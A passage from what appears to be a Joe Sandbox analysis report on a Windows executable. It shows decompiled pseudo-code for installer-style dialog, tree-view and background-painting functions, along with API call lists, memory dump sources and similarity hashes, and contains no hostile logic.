					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x452439 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C27(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x2018 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x452438) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x43c074;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x43c088;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x43c074 = 0;
								 *0x43c088 = 0;
								 *0x452480 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x452439 & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA7();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x43c088;
									_t206 =  *0x452448;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x45244c <= 0) {
										L86:
										if( *0x4524de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x44e3fc + 0x10)) != 0) {
											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x806]);
									} while (_v24 <  *0x45244c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x43c088);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x452480 = _a4;
					_v20 = 2;
					 *0x43c088 = GlobalAlloc(0x40,  *0x45244c << 2);
					_t264 = LoadImageA( *0x452420, 0x6e, 0, 0, 0, 0);
					 *0x43c07c =  *0x43c07c | 0xffffffff;
					_v16 = _t264;
					 *0x43c084 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x43c074 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x43c074);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D4(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D4(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x45244c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x43c088 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x43c088 + _t329 * 4) = _t290;
									_v16 =  *( *0x43c088 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x2018]);
							_v32 = _t316;
						} while (_t329 <  *0x45244c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404309(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404309(_v12);
								L93:
								return E0040433B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

























































                                                            0x00404cf7
                                                            0x00404cff
                                                            0x00404d07
                                                            0x00404d0d
                                                            0x00404d25
                                                            0x00404d28
                                                            0x00404d29
                                                            0x00404f56
                                                            0x00404f5d
                                                            0x00404f71
                                                            0x00404f5f
                                                            0x00404f61
                                                            0x00404f64
                                                            0x00404f65
                                                            0x00404f6c
                                                            0x00404f6c
                                                            0x00404f7d
                                                            0x00404f8b
                                                            0x00404f8e
                                                            0x00404fa4
                                                            0x00405019
                                                            0x0040501c
                                                            0x0040501e
                                                            0x00405028
                                                            0x00405036
                                                            0x00405036
                                                            0x00405038
                                                            0x00405042
                                                            0x00405048
                                                            0x0040504b
                                                            0x0040504e
                                                            0x00405069
                                                            0x00405050
                                                            0x0040505a
                                                            0x0040505a
                                                            0x0040504e
                                                            0x00405042
                                                            0x00000000
                                                            0x0040501c
                                                            0x00404fa9
                                                            0x00404fb4
                                                            0x00404fb9
                                                            0x00404fc0
                                                            0x00404fc5
                                                            0x00404fc9
                                                            0x00404fd4
                                                            0x00404fd4
                                                            0x00404fd8
                                                            0x00404fdc
                                                            0x00404fe0
                                                            0x00404ff3
                                                            0x00404fe2
                                                            0x00404fe2
                                                            0x00404fe9
                                                            0x00404fef
                                                            0x00404feb
                                                            0x00404feb
                                                            0x00404feb
                                                            0x00404fe9
                                                            0x00404ff7
                                                            0x00404ff9
                                                            0x0040500c
                                                            0x0040500f
                                                            0x00405012
                                                            0x00405012
                                                            0x00404fdc
                                                            0x00000000
                                                            0x00404fc9
                                                            0x00404fab
                                                            0x00404fb2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040506c
                                                            0x0040506c
                                                            0x00405073
                                                            0x004050e4
                                                            0x004050ec
                                                            0x004050f4
                                                            0x004050f4
                                                            0x004050fd
                                                            0x004050ff
                                                            0x00405106
                                                            0x00405109
                                                            0x00405109
                                                            0x0040510f
                                                            0x00405116
                                                            0x00405119
                                                            0x00405119
                                                            0x0040511f
                                                            0x00405125
                                                            0x0040512b
                                                            0x0040512b
                                                            0x00405138
                                                            0x00405299
                                                            0x004052a0
                                                            0x004052bd
                                                            0x004052c3
                                                            0x004052d5
                                                            0x004052d5
                                                            0x00000000
                                                            0x0040513e
                                                            0x00405140
                                                            0x00405145
                                                            0x0040514a
                                                            0x0040514f
                                                            0x00405151
                                                            0x00405151
                                                            0x00405152
                                                            0x00405153
                                                            0x00405155
                                                            0x00405155
                                                            0x0040515d
                                                            0x0040519e
                                                            0x004051a0
                                                            0x004051b0
                                                            0x004051b3
                                                            0x004051b8
                                                            0x004051bf
                                                            0x004051c2
                                                            0x00405264
                                                            0x0040526d
                                                            0x00405275
                                                            0x00405275
                                                            0x00405283
                                                            0x00405294
                                                            0x00405294
                                                            0x00000000
                                                            0x00405283
                                                            0x004051c8
                                                            0x004051cb
                                                            0x004051d1
                                                            0x004051d6
                                                            0x004051d8
                                                            0x004051da
                                                            0x004051e0
                                                            0x004051e7
                                                            0x004051ec
                                                            0x004051f3
                                                            0x004051f6
                                                            0x004051f6
                                                            0x004051fd
                                                            0x00405209
                                                            0x0040520d
                                                            0x0040520f
                                                            0x0040520f
                                                            0x004051ff
                                                            0x00405201
                                                            0x00405201
                                                            0x0040522f
                                                            0x0040523b
                                                            0x0040524a
                                                            0x0040524a
                                                            0x0040524c
                                                            0x0040524f
                                                            0x00405258
                                                            0x00000000
                                                            0x0040515f
                                                            0x0040516a
                                                            0x0040516d
                                                            0x00405172
                                                            0x00405174
                                                            0x00405178
                                                            0x00405188
                                                            0x00405192
                                                            0x00405194
                                                            0x00405197
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040517a
                                                            0x00405180
                                                            0x00405182
                                                            0x00405182
                                                            0x00405183
                                                            0x00405184
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040515d
                                                            0x00405138
                                                            0x0040507b
                                                            0x00000000
                                                            0x00405091
                                                            0x0040509b
                                                            0x004050a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004050b2
                                                            0x004050b7
                                                            0x004050c3
                                                            0x004050c3
                                                            0x004050c5
                                                            0x004050d4
                                                            0x004050d6
                                                            0x004050da
                                                            0x004050dd
                                                            0x00000000
                                                            0x004050dd
                                                            0x0040507b
                                                            0x00404d2f
                                                            0x00404d32
                                                            0x00404d35
                                                            0x00404d45
                                                            0x00404d58
                                                            0x00404d63
                                                            0x00404d69
                                                            0x00404d77
                                                            0x00404d8a
                                                            0x00404d8f
                                                            0x00404d9a
                                                            0x00404da3
                                                            0x00404db9
                                                            0x00404dc9
                                                            0x00404dd5
                                                            0x00404dd5
                                                            0x00404dda
                                                            0x00404de0
                                                            0x00404de2
                                                            0x00404de5
                                                            0x00404dea
                                                            0x00404def
                                                            0x00404df1
                                                            0x00404df1
                                                            0x00404e11
                                                            0x00404e11
                                                            0x00404e13
                                                            0x00404e14
                                                            0x00404e19
                                                            0x00404e1f
                                                            0x00404e23
                                                            0x00404e28
                                                            0x00404e30
                                                            0x00404e34
                                                            0x00404e39
                                                            0x00404e3e
                                                            0x00404e46
                                                            0x00404e49
                                                            0x00404f18
                                                            0x00404f2b
                                                            0x00000000
                                                            0x00404e4f
                                                            0x00404e52
                                                            0x00404e55
                                                            0x00404e58
                                                            0x00404e58
                                                            0x00404e5d
                                                            0x00404e66
                                                            0x00404e69
                                                            0x00404e6d
                                                            0x00404e70
                                                            0x00404e73
                                                            0x00404e7c
                                                            0x00404e85
                                                            0x00404e88
                                                            0x00404e8b
                                                            0x00404e8e
                                                            0x00404ecc
                                                            0x00404ef7
                                                            0x00404ece
                                                            0x00404edd
                                                            0x00404edd
                                                            0x00404e90
                                                            0x00404e93
                                                            0x00404ea1
                                                            0x00404eab
                                                            0x00404eb3
                                                            0x00404eba
                                                            0x00404ec5
                                                            0x00404ec5
                                                            0x00404e8e
                                                            0x00404efd
                                                            0x00404efe
                                                            0x00404f0a
                                                            0x00404f0a
                                                            0x00404f16
                                                            0x00404f31
                                                            0x00404f34
                                                            0x00404f51
                                                            0x00000000
                                                            0x00404f36
                                                            0x00404f3b
                                                            0x00404f44
                                                            0x004052d7
                                                            0x004052e9
                                                            0x004052e9
                                                            0x00404f34
                                                            0x00000000
                                                            0x00404f16
                                                            0x00404e49

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                            • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                            • SendMessageA.USER32 ref: 00404DB9
                                                            • SendMessageA.USER32 ref: 00404DC5
                                                            • SendMessageA.USER32 ref: 00404DD5
                                                            • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                            • SendMessageA.USER32 ref: 00404E05
                                                            • SendMessageA.USER32 ref: 00404E11
                                                            • SendMessageA.USER32 ref: 00404EAB
                                                            • SendMessageA.USER32 ref: 00404EDB
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • SendMessageA.USER32 ref: 00404EEF
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                            • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                            • SendMessageA.USER32 ref: 00405036
                                                            • SendMessageA.USER32 ref: 0040509B
                                                            • SendMessageA.USER32 ref: 004050B0
                                                            • SendMessageA.USER32 ref: 004050D4
                                                            • SendMessageA.USER32 ref: 004050F4
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405109
                                                            • GlobalFree.KERNEL32(?), ref: 00405119
                                                            • SendMessageA.USER32 ref: 00405192
                                                            • SendMessageA.USER32 ref: 0040523B
                                                            • SendMessageA.USER32 ref: 0040524A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                            • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                            • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                            • ShowWindow.USER32(00000000), ref: 004052D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction ID: 1a89480aaa14410690893e3e2f323560a6be9801fb1e0a4c64b47d85f3ee2a2e
                                                            • Opcode Fuzzy Hash: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction Fuzzy Hash: A90268B0900209EFEB149FA4CD85AAE7BB5FB45314F14817AF614BA2E1C7788E41DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040443F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202windowstringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x43405c =  *0x43405c + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E0040433B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x44a3c0;
							if(_t100 - _t109 < 0x4000) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								E004046E3(_a4, _v8);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x452428, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x452428, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x43405c != 0) {
						goto L25;
					} else {
						_t103 =  *0x438068; // 0x720a3c
						_t25 = _t103 + 0x14; // 0x720a50
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BF();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x44e3fc - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x452458;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040440A;
				E004042D4(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404309(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x452430 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x43405c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x43405c = 0;
				return 0;
			}


















                                                            0x0040444f
                                                            0x00404574
                                                            0x004045d0
                                                            0x004045d4
                                                            0x004046a1
                                                            0x004046a3
                                                            0x004046a3
                                                            0x004046a9
                                                            0x004046a9
                                                            0x004046ac
                                                            0x00000000
                                                            0x004046b3
                                                            0x004045e2
                                                            0x004045e4
                                                            0x004045ee
                                                            0x004045f9
                                                            0x004045fc
                                                            0x004045ff
                                                            0x0040460a
                                                            0x0040460d
                                                            0x00404614
                                                            0x00404622
                                                            0x0040463a
                                                            0x0040463c
                                                            0x00404644
                                                            0x00404653
                                                            0x00404655
                                                            0x00404655
                                                            0x00404614
                                                            0x0040465f
                                                            0x00000000
                                                            0x0040466a
                                                            0x0040466e
                                                            0x0040467f
                                                            0x0040467f
                                                            0x00404685
                                                            0x00404693
                                                            0x00404693
                                                            0x00000000
                                                            0x00404697
                                                            0x0040465f
                                                            0x0040457f
                                                            0x00000000
                                                            0x00404593
                                                            0x00404593
                                                            0x00404599
                                                            0x00404599
                                                            0x0040459f
                                                            0x00000000
                                                            0x00000000
                                                            0x004045c4
                                                            0x004045c6
                                                            0x004045cb
                                                            0x00000000
                                                            0x004045cb
                                                            0x0040457f
                                                            0x00404455
                                                            0x00404458
                                                            0x0040445d
                                                            0x0040446e
                                                            0x0040446e
                                                            0x00404475
                                                            0x00404478
                                                            0x0040447a
                                                            0x0040447f
                                                            0x00404488
                                                            0x0040448e
                                                            0x0040449a
                                                            0x0040449d
                                                            0x004044a6
                                                            0x004044ab
                                                            0x004044ae
                                                            0x004044b3
                                                            0x004044ca
                                                            0x004044d1
                                                            0x004044e4
                                                            0x004044e7
                                                            0x004044fc
                                                            0x00404503
                                                            0x00404508
                                                            0x0040450d
                                                            0x0040450d
                                                            0x0040451c
                                                            0x0040452b
                                                            0x0040453d
                                                            0x00404542
                                                            0x00404552
                                                            0x00404554
                                                            0x00000000

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: D@$<r$Call$N
                                                            • API String ID: 3103080414-936878463
                                                            • Opcode ID: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction ID: 2bd06c0691c76b957e6ebeae131719b0bc75d5682994f338a7987809ed17278e
                                                            • Opcode Fuzzy Hash: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction Fuzzy Hash: A661A1B1A40309BFEB109F61DC45B6A3B68EB85714F10443AFB04BB1D1D7B9A9618F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x452430;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x44e420, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x452428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
